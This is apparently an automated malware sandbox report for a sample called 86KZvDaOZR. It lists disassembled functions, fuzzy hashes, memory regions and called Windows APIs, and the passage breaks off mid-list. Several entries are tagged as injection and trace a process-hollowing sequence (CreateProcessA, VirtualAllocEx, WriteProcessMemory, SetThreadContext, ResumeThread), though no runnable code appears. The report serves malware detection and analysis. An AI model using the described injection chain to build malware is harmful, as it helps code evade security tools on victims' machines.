Associated: 00000000.00000002.2028863063.000000006CFAC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2029217229.000000006CFAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_86KZvDaOZR.jbxd

Similarity

API ID: ArrayDestroyReadSafe
String ID:
API String ID: 616443815-0
Opcode ID: 568c710df2ed8fea78b9a5490fcd07a45dd087f0b8429482444aeaf20005e37f
Instruction ID: 9929ac0dd78ce98354fbca87e5605567170e359e022830bf1fe5c36de926f8d7
Opcode Fuzzy Hash: 568c710df2ed8fea78b9a5490fcd07a45dd087f0b8429482444aeaf20005e37f
Instruction Fuzzy Hash: 327102F0D0C6969EDB218FB58840699FBB1AB0A328F188B9CD9A597FD1C331D442CB50

Function 6CF162C0 Relevance: 3.1, APIs: 2, Instructions: 149COMMON

Download Yara Rule

APIs

Part of subcall function 6CF69BB5: _malloc.LIBCMT ref: 6CF69BCF

std::exception::exception.LIBCMT ref: 6CF16466

Part of subcall function 6CF69533: std::exception::_Copy_str.LIBCMT ref: 6CF6954E

__CxxThrowException@8.LIBCMT ref: 6CF1647D

Part of subcall function 6CF6AC75: RaiseException.KERNEL32(?,?,6CF69C34,A64A5C11,?,?,?,?,6CF69C34,A64A5C11,6CF99C90,6CFAB974,A64A5C11), ref: 6CF6ACB7

Memory Dump Source

Source File: 00000000.00000002.2026296615.000000006CF01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.2026279524.000000006CF00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2027926866.000000006CF84000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028771594.000000006CF9E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028791861.000000006CFA0000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028812796.000000006CFA1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028832778.000000006CFA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2029217229.000000006CFAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_86KZvDaOZR.jbxd

Similarity

API ID: Copy_strExceptionException@8RaiseThrow_mallocstd::exception::_std::exception::exception
String ID:
API String ID: 2299493649-0
Opcode ID: fdb6cb498b3e4bfa2f751009dc97312a19b79f40b60997a2aa067f2e67af838a
Instruction ID: 6f466a7be85fb435ba68e606025a257e1bb0696c79ccfed037aff30b5f6ae7b0
Opcode Fuzzy Hash: fdb6cb498b3e4bfa2f751009dc97312a19b79f40b60997a2aa067f2e67af838a
Instruction Fuzzy Hash: 1B515AB29193409FD700CF69C881A8ABBF4FB85744F50492EF999C7B90D771DA08CB92

Function 6CF2D2E0 Relevance: 3.1, APIs: 2, Instructions: 109COMMON

Download Yara Rule

APIs

Part of subcall function 6CF69BB5: _malloc.LIBCMT ref: 6CF69BCF

std::exception::exception.LIBCMT ref: 6CF2D3E8
__CxxThrowException@8.LIBCMT ref: 6CF2D3FF

Memory Dump Source

Source File: 00000000.00000002.2026296615.000000006CF01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.2026279524.000000006CF00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2027926866.000000006CF84000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028771594.000000006CF9E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028791861.000000006CFA0000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028812796.000000006CFA1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028832778.000000006CFA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2029217229.000000006CFAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_86KZvDaOZR.jbxd

Similarity

API ID: Exception@8Throw_mallocstd::exception::exception
String ID:
API String ID: 4063778783-0
Opcode ID: 2218c89b429486434f238090a1f22560af5b5ffc161c3d95217621ab9cca21a3
Instruction ID: 46b0381f0c729df0a76c5f063ff15560fd0f1a32e5e520201ae463d50f2f3d6b
Opcode Fuzzy Hash: 2218c89b429486434f238090a1f22560af5b5ffc161c3d95217621ab9cca21a3
Instruction Fuzzy Hash: BB317C715087059FCB04CF69D48099ABBF4FF89714F608A2EF4558BB50E735EA0ACB92

Function 6CF18400 Relevance: 3.0, APIs: 2, Instructions: 48COMMON

Download Yara Rule

APIs

Part of subcall function 6CF69BB5: _malloc.LIBCMT ref: 6CF69BCF

std::exception::exception.LIBCMT ref: 6CF18449
__CxxThrowException@8.LIBCMT ref: 6CF1845E

Memory Dump Source

Source File: 00000000.00000002.2026296615.000000006CF01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.2026279524.000000006CF00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2027926866.000000006CF84000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028771594.000000006CF9E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028791861.000000006CFA0000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028812796.000000006CFA1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028832778.000000006CFA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2029217229.000000006CFAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_86KZvDaOZR.jbxd

Similarity

API ID: Exception@8Throw_mallocstd::exception::exception
String ID:
API String ID: 4063778783-0
Opcode ID: 4d600b83ca96dbbdc3c80755622bb5b41d9d75b4d3b0c799b1665b6ea7a0349c
Instruction ID: 6c05471e04fc87e716e160cdb18749d9b7b12aa96905222f10f812ca2f8b9e2f
Opcode Fuzzy Hash: 4d600b83ca96dbbdc3c80755622bb5b41d9d75b4d3b0c799b1665b6ea7a0349c
Instruction Fuzzy Hash: 72014F75904208AFCB08DF55D49089ABBF5EF58300B51C5AEDD2A4BF60EF30EA05CB95

Function 05860001 Relevance: 2.6, Strings: 2, Instructions: 89COMMON

Download Yara Rule

Strings

Tecq, xrefs: 05860077
TJhq, xrefs: 0586008F

Memory Dump Source

Source File: 00000000.00000002.2025449746.0000000005860000.00000040.00000800.00020000.00000000.sdmp, Offset: 05860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5860000_86KZvDaOZR.jbxd

Similarity

API ID:
String ID: TJhq$Tecq
API String ID: 0-1580033827
Opcode ID: 7aa64092593a21761d71416dc6e3ec53f6462424658c74c9eb7a3f41db5c655b
Instruction ID: 1d48b1e17885c1de86ece8c0c20f1d1de27fb4a7492418ba84a7b1bd4d47dabb
Opcode Fuzzy Hash: 7aa64092593a21761d71416dc6e3ec53f6462424658c74c9eb7a3f41db5c655b
Instruction Fuzzy Hash: 713160216093D05FCB1797B4982466F7FB1AF87200F0A44EFD546DB2E3DA254D09C3A2

Function 6CF18D60 Relevance: 2.6, APIs: 2, Instructions: 78COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,?,00000000,6CF18C13,?,6CF18CD3,?,6CF18C13,00000000,?,?,6CF18C13,?,?), ref: 6CF18D73
LeaveCriticalSection.KERNEL32(?,?,?,6CF18CD3,?,6CF18C13,00000000,?,?,6CF18C13,?,?), ref: 6CF18D8C

Memory Dump Source

Source File: 00000000.00000002.2026296615.000000006CF01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.2026279524.000000006CF00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2027926866.000000006CF84000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028771594.000000006CF9E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028791861.000000006CFA0000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028812796.000000006CFA1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028832778.000000006CFA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2029217229.000000006CFAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_86KZvDaOZR.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID:
API String ID: 3168844106-0
Opcode ID: 5a035a0f34ba5ce3d372e5573d11ec77d4a29b8ab475b6fc30df4e09368d417f
Instruction ID: 120887218a550754070a71ebde5e049c69d0e608fe4ef206b9835e4ec766a341
Opcode Fuzzy Hash: 5a035a0f34ba5ce3d372e5573d11ec77d4a29b8ab475b6fc30df4e09368d417f
Instruction Fuzzy Hash: 83211675204109EF8B04DF89D990DAAB3BAFFC9210B158649E90A87750CB31EE16CBA1

Function 05860048 Relevance: 2.6, Strings: 2, Instructions: 64COMMON

Download Yara Rule

Strings

Tecq, xrefs: 05860077
TJhq, xrefs: 0586008F

Memory Dump Source

Source File: 00000000.00000002.2025449746.0000000005860000.00000040.00000800.00020000.00000000.sdmp, Offset: 05860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5860000_86KZvDaOZR.jbxd

Similarity

API ID:
String ID: TJhq$Tecq
API String ID: 0-1580033827
Opcode ID: 91205a09452d8b3b536f452b1cca422f150bb57ed0df82e6a0c10f7c163ddcdc
Instruction ID: 51e37374d2397693eba64c747effef5639cfa5b19f5cd9580aa217198d605e2b
Opcode Fuzzy Hash: 91205a09452d8b3b536f452b1cca422f150bb57ed0df82e6a0c10f7c163ddcdc
Instruction Fuzzy Hash: D411D631B001145BCB14EBA998587BFBAE6EBC9200F10446DD906973C1CF715E0583E2

Function 6CF18BC0 Relevance: 2.6, APIs: 2, Instructions: 52COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,?,?,?,?,6CF16890,?), ref: 6CF18BDD
LeaveCriticalSection.KERNEL32(?), ref: 6CF18C23

Memory Dump Source

Source File: 00000000.00000002.2026296615.000000006CF01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.2026279524.000000006CF00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2027926866.000000006CF84000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028771594.000000006CF9E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028791861.000000006CFA0000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028812796.000000006CFA1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028832778.000000006CFA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2029217229.000000006CFAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_86KZvDaOZR.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID:
API String ID: 3168844106-0
Opcode ID: 059bdb36b479ac63b809282b457878d107d7eeb2693e8393efccebc16ac96192
Instruction ID: 45fad850363e3d9da5a56141e85cb4ffe5e5b2ac5bc00bff060baecdd002b305
Opcode Fuzzy Hash: 059bdb36b479ac63b809282b457878d107d7eeb2693e8393efccebc16ac96192
Instruction Fuzzy Hash: B0017C71705104AFC744DFA8D89099BF7A9FB99214710426AE945C7B00DB32EE55C7D1

Function 0510ACA7 Relevance: 1.8, APIs: 1, Instructions: 298processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0510AF7F

Memory Dump Source

Source File: 00000000.00000002.2022134661.0000000005100000.00000040.00000800.00020000.00000000.sdmp, Offset: 05100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5100000_86KZvDaOZR.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 02d985e94da5bb9192ad4b31b4e232527007d46e6435a9f588df161b847f4639
Instruction ID: d0324034f05ebca3f66fb2a4b40b8b2a4a26a0fec7d24c9447fafafb31c76cbf
Opcode Fuzzy Hash: 02d985e94da5bb9192ad4b31b4e232527007d46e6435a9f588df161b847f4639
Instruction Fuzzy Hash: 5CB124B4D043598FDB10CFA8C845BEEBBB2FF09304F14A169E859A7294D7B49985CF41

Function 0510ACB0 Relevance: 1.8, APIs: 1, Instructions: 295processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0510AF7F

Memory Dump Source

Source File: 00000000.00000002.2022134661.0000000005100000.00000040.00000800.00020000.00000000.sdmp, Offset: 05100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5100000_86KZvDaOZR.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: dc076f52c11c105589e1b10ae3c8b4de2de32e54696e1b0df2a452dc3affd020
Instruction ID: 5680e05da3f051e9d14377d7c5ea1f1bd35a77ee5d43eccc9f6225cdbc8e0850
Opcode Fuzzy Hash: dc076f52c11c105589e1b10ae3c8b4de2de32e54696e1b0df2a452dc3affd020
Instruction Fuzzy Hash: 83B114B4D04359CFDB10CFA8C845BEEBBB2BF09304F14A169E859A7294D7B49985CF81

Function 6CF2E2CE Relevance: 1.7, APIs: 1, Instructions: 214COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2026296615.000000006CF01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.2026279524.000000006CF00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2027926866.000000006CF84000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028771594.000000006CF9E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028791861.000000006CFA0000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028812796.000000006CFA1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028832778.000000006CFA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2029217229.000000006CFAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_86KZvDaOZR.jbxd

Similarity

API ID: _malloc
String ID:
API String ID: 1579825452-0
Opcode ID: 4067cca48321b8c625a4ae9c020d1002142500f1cc07067249a6d5735650821f
Instruction ID: 0a7f4165afc19c2789fb5642815e2fb83b2dcf9c19650cd09705d2c6f794f864
Opcode Fuzzy Hash: 4067cca48321b8c625a4ae9c020d1002142500f1cc07067249a6d5735650821f
Instruction Fuzzy Hash: F08164B19183418FEB20DFF5C48179EBBF0BB41309F24496DD1598BB90DB7999488B93

Function 0510B3C8 Relevance: 1.6, APIs: 1, Instructions: 121injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0510B4A5

Memory Dump Source

Source File: 00000000.00000002.2022134661.0000000005100000.00000040.00000800.00020000.00000000.sdmp, Offset: 05100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5100000_86KZvDaOZR.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: e369d95c0e0a1a4d8010893a3e46423589fb1efdf6fb033d3f22e81bf18ada7d
Instruction ID: e29f75349197ace6e223eb2b8779cd6d82e94a73715246f8893b196abeabc0ed
Opcode Fuzzy Hash: e369d95c0e0a1a4d8010893a3e46423589fb1efdf6fb033d3f22e81bf18ada7d
Instruction Fuzzy Hash: 6E4179B5D042589FCF10CFA9D984AEEFBF1BB49310F24902AE819B7250D375AA45CF64

Function 0510B3D0 Relevance: 1.6, APIs: 1, Instructions: 115injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0510B4A5

Memory Dump Source

Source File: 00000000.00000002.2022134661.0000000005100000.00000040.00000800.00020000.00000000.sdmp, Offset: 05100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5100000_86KZvDaOZR.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 23c9f398de0f186793854d3da9622aff6cb509eb64db0001904fa40d51ad783d
Instruction ID: 1b1db68e42ea620688b444b04c0b13c29cc188793aa440b33fc0b068d4351d22
Opcode Fuzzy Hash: 23c9f398de0f186793854d3da9622aff6cb509eb64db0001904fa40d51ad783d
Instruction Fuzzy Hash: 724187B5D042589FCF00CFA9D984ADEFBF1BB49310F24902AE819B7250D375AA45CF64

Function 0510B2A8 Relevance: 1.6, APIs: 1, Instructions: 106memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0510B35C

Memory Dump Source

Source File: 00000000.00000002.2022134661.0000000005100000.00000040.00000800.00020000.00000000.sdmp, Offset: 05100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5100000_86KZvDaOZR.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 79d851d25f23eb89904e992dc428281e17444c2dc3220f25682b1ce5f0d1b2c7
Instruction ID: 0af1506db7fd1701cb6194b731e56867984659088f793f8cdd8313f2ca9aebde
Opcode Fuzzy Hash: 79d851d25f23eb89904e992dc428281e17444c2dc3220f25682b1ce5f0d1b2c7
Instruction Fuzzy Hash: 8C4178B8D052589FCF10CFA9D984ADEFBB1BB49310F20A01AE814B7310D775A905CF64

Function 00FFF690 Relevance: 1.6, Strings: 1, Instructions: 355COMMON

Download Yara Rule

Strings

Hgq, xrefs: 00FFF796

Memory Dump Source

Source File: 00000000.00000002.2018104112.0000000000FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ff0000_86KZvDaOZR.jbxd

Similarity

API ID:
String ID: Hgq
API String ID: 0-2103768809
Opcode ID: bfc1e218bdb0a6effe9532afa94ce6a3a6f14ca12f15e48d1f1b621727050566
Instruction ID: 8b6bc3e10d604aa5c2e4fbd8012945dfd5e44563fcd830df7198ad3a731ff349
Opcode Fuzzy Hash: bfc1e218bdb0a6effe9532afa94ce6a3a6f14ca12f15e48d1f1b621727050566
Instruction Fuzzy Hash: 35E1A678208609CFDB06BFA5EA54B253BA3FB8C701F118425E9054B79DEF746891EF21

Function 0510B2B0 Relevance: 1.6, APIs: 1, Instructions: 100memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0510B35C

Memory Dump Source

Source File: 00000000.00000002.2022134661.0000000005100000.00000040.00000800.00020000.00000000.sdmp, Offset: 05100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5100000_86KZvDaOZR.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: b1edbad3c6f95cd01cbcdc4974bf7a3337d3663a94624670ef5a86a2117d6ccd
Instruction ID: 0642bec91f2c26daf3bb6e1eb3ff2e948770ca82c4500597e4facc53195112c6
Opcode Fuzzy Hash: b1edbad3c6f95cd01cbcdc4974bf7a3337d3663a94624670ef5a86a2117d6ccd
Instruction Fuzzy Hash: 913176B9D042589FCF10CFA9D984A9EFBF1BB49310F20A01AE818BB310D775A941CF64

Function 6CF17140 Relevance: 1.6, APIs: 1, Instructions: 92COMMON

Download Yara Rule

APIs

Part of subcall function 6CF32820: _malloc.LIBCMT ref: 6CF32871

std::tr1::_Xweak.LIBCPMT ref: 6CF171D2

Memory Dump Source

Source File: 00000000.00000002.2026296615.000000006CF01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.2026279524.000000006CF00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2027926866.000000006CF84000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028771594.000000006CF9E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028791861.000000006CFA0000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028812796.000000006CFA1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028832778.000000006CFA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2029217229.000000006CFAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_86KZvDaOZR.jbxd

Similarity

API ID: Xweak_mallocstd::tr1::_
String ID:
API String ID: 4085767713-0
Opcode ID: 9f5223c74bebcaead7d7fc77e60511c92e83fe9cdde4f9b9f86e30fa3559359d
Instruction ID: 81cb653d1054e0fde918325a2fa2b376cd4bac970ce157695fe0a9e33ded7233
Opcode Fuzzy Hash: 9f5223c74bebcaead7d7fc77e60511c92e83fe9cdde4f9b9f86e30fa3559359d
Instruction Fuzzy Hash: 553183B4A0574A9FCB10CFA5C880AABB7F5FF49218F20865EE81597B41D731E905CB90

Function 0510B1A8 Relevance: 1.6, APIs: 1, Instructions: 84threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,?), ref: 0510B23B

Memory Dump Source

Source File: 00000000.00000002.2022134661.0000000005100000.00000040.00000800.00020000.00000000.sdmp, Offset: 05100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5100000_86KZvDaOZR.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 126cc971ca5fa853a9a468f817b476c8a5cc5ddad0fb259d50ae8a03dbaf0c4a
Instruction ID: baa85ee750b2950a35845f435731279b2cd29c02d2fbdbb770606442e08c33ec
Opcode Fuzzy Hash: 126cc971ca5fa853a9a468f817b476c8a5cc5ddad0fb259d50ae8a03dbaf0c4a
Instruction Fuzzy Hash: C531BBB4D052589FCB10CFA9E584AEEFBF0AB49310F24902AE819B7350C375A945CF64

Function 0510B1B0 Relevance: 1.6, APIs: 1, Instructions: 81threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,?), ref: 0510B23B

Memory Dump Source

Source File: 00000000.00000002.2022134661.0000000005100000.00000040.00000800.00020000.00000000.sdmp, Offset: 05100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5100000_86KZvDaOZR.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: d16f5e7d5347841ed967e23f08c2f0b1be27e12a5974dd6dece7a9fbeb400d71
Instruction ID: 7bcb88c20bb71faac1ad68231e8c028fdaea5631eb3db4ee1dbe169decef46be
Opcode Fuzzy Hash: d16f5e7d5347841ed967e23f08c2f0b1be27e12a5974dd6dece7a9fbeb400d71
Instruction Fuzzy Hash: D331C9B4D052589FCB10CFA9E584ADEFBF0BB49310F20902AE819B7350D378AA45CF64

Function 05100F08 Relevance: 1.6, APIs: 1, Instructions: 80libraryCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNELBASE(?), ref: 05100FAA

Memory Dump Source

Source File: 00000000.00000002.2022134661.0000000005100000.00000040.00000800.00020000.00000000.sdmp, Offset: 05100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5100000_86KZvDaOZR.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 1f09a82b02075314ceb2c6ba084ff075ce22b97305ca475f901204851f3292d8
Instruction ID: c2f1c13f16283a8de1ed669e6e41b1f66a6ebb6635031a5c6220122cb73132c4
Opcode Fuzzy Hash: 1f09a82b02075314ceb2c6ba084ff075ce22b97305ca475f901204851f3292d8
Instruction Fuzzy Hash: F731CAB4D002098FCB14CFA9D584ADEFBF1AF49310F14902AE818B7360D374AA41CF64

Function 05100F10 Relevance: 1.6, APIs: 1, Instructions: 78libraryCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNELBASE(?), ref: 05100FAA

Memory Dump Source

Source File: 00000000.00000002.2022134661.0000000005100000.00000040.00000800.00020000.00000000.sdmp, Offset: 05100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5100000_86KZvDaOZR.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 27dd4a56f02b410e11e828bd7a60d258dd9e8fc5e8b87fc0c810ebba5eacbc0b
Instruction ID: 2280185e5f38f84cade1be5d26ed1e5a508e83fc975aa802b33fc5fe92e6615c
Opcode Fuzzy Hash: 27dd4a56f02b410e11e828bd7a60d258dd9e8fc5e8b87fc0c810ebba5eacbc0b
Instruction Fuzzy Hash: 91319AB4D002099FCB14CFA9D584ADEFBF5AB49310F14906AE819B7360D374AA45CF65

Function 0510B523 Relevance: 1.6, APIs: 1, Instructions: 72threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE(?), ref: 0510B5A5

Memory Dump Source

Source File: 00000000.00000002.2022134661.0000000005100000.00000040.00000800.00020000.00000000.sdmp, Offset: 05100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5100000_86KZvDaOZR.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 5f939de656af1b878d5b4a43d6710b2c14918bc3a7638ed3293501cef5f688d0
Instruction ID: 0e2e66f8deeaba9740d4ed5f176cfd546ad0d66ad05e0304321724d3df7617b8
Opcode Fuzzy Hash: 5f939de656af1b878d5b4a43d6710b2c14918bc3a7638ed3293501cef5f688d0
Instruction Fuzzy Hash: B931A5B8D112189FCB10CFA9E985A9EFBF4BB49310F14906AE819B7310D775A901CFA4

Function 0510B528 Relevance: 1.6, APIs: 1, Instructions: 71threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE(?), ref: 0510B5A5

Memory Dump Source

Source File: 00000000.00000002.2022134661.0000000005100000.00000040.00000800.00020000.00000000.sdmp, Offset: 05100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5100000_86KZvDaOZR.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 655708f4dae0a59002f7f6c6d06e2e0fea57df60e236c883f70dfc3d885f3cc1
Instruction ID: 374949c111fd5296571eb7ea310f720563e4cd47647c462da1d79984d3ab0687
Opcode Fuzzy Hash: 655708f4dae0a59002f7f6c6d06e2e0fea57df60e236c883f70dfc3d885f3cc1
Instruction Fuzzy Hash: 2C31A6B8D112189FCB10CFA9E984ADEFBF4BB49310F10906AE819B7310D775A901CFA4

Function 6CF2EA40 Relevance: 1.5, APIs: 1, Instructions: 47memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 6CF69BB5: _malloc.LIBCMT ref: 6CF69BCF

SysAllocString.OLEAUT32 ref: 6CF2EA8D

Memory Dump Source

Source File: 00000000.00000002.2026296615.000000006CF01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.2026279524.000000006CF00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2027926866.000000006CF84000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028771594.000000006CF9E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028791861.000000006CFA0000.00000008.00000001.01000000.00000007.sdmpDownload File
